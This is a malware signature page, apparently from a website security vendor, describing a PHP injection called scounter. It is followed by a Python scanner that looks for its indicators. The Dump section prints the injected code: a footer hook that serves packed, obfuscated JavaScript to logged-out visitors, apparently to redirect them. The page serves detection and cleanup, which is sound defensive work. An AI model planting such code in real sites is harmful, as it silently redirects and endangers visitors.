Malware Signatures

php.injected.scounter.001

This malware is crafted to pass, to the untrained eye, as part of a legitimate counter script. It uses a deceptive comment, <!--scounter-->, and JavaScript obfuscation to make the code harder to understand.
Of all the payloads found related to php.injected.scounter, the most common are conditional redirects and iframe injection.

Affecting

Any website running vulnerable software or hosted on a server with compromised credentials

Cleanup

Inspect your website for any entry of and remove the related code.

Dump


<?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!--scounter-->';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return a|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
}
}
}
?>
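
The Cleanup step as a scan, in an added example that is not part of the original signature page: a Python script that walks a web root looking for the strings visible in the dump above (the <!--scounter--> marker, the add_sscounter hook, the packed eval and the logged-out visitor check). The extension list, the split into "infected" and "review" verdicts and the SAMPLE buffer are assumptions made for this example.

```python
import os
import re
import sys

# Indicators copied from the dump on this page. Which ones count as
# conclusive is an assumption of this example.
INDICATORS = {
    "marker_comment": re.compile(rb"<!--\s*scounter\s*-->"),
    "hook_function": re.compile(rb"\badd_sscounter\b"),
    "footer_hook": re.compile(rb"add_action\(\s*['\"]get_footer['\"]"),
    "packed_js": re.compile(rb"eval\(function\(p,a,c,k,e,r\)"),
    "visitor_gate": re.compile(rb"time\(\)\s*%\s*2\s*==\s*0\s*&&\s*!\s*is_user_logged_in\(\)"),
}
STRONG = {"marker_comment", "hook_function"}  # the rest also occur in clean code
SCAN_EXT = (".php", ".phtml", ".inc", ".html", ".htm", ".js")

# Constructed sample: the structure of the dump with the packed payload cut out.
SAMPLE = b"""<?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!--scounter-->';
if(time()%2 == 0 && !is_user_logged_in()){ /* payload removed */ }
}
"""

def match_indicators(data):
    """Return the sorted names of the indicators found in a bytes buffer."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(data))

def scan_tree(root):
    """Map relative path -> (verdict, indicator names) for every file with a hit."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(SCAN_EXT):
                continue
            full = os.path.join(dirpath, fname)
            try:
                with open(full, "rb") as fh:
                    hits = match_indicators(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            if hits:
                verdict = "infected" if STRONG.intersection(hits) else "review"
                findings[os.path.relpath(full, root)] = (verdict, hits)
    return findings

if __name__ == "__main__":
    print("sample:", match_indicators(SAMPLE))
    for path, (verdict, hits) in sorted(scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        print(f"{verdict:8} {path}: {', '.join(hits)}")
```

A "review" verdict means only indicators that also occur in clean code matched, so check those files by hand before removing anything.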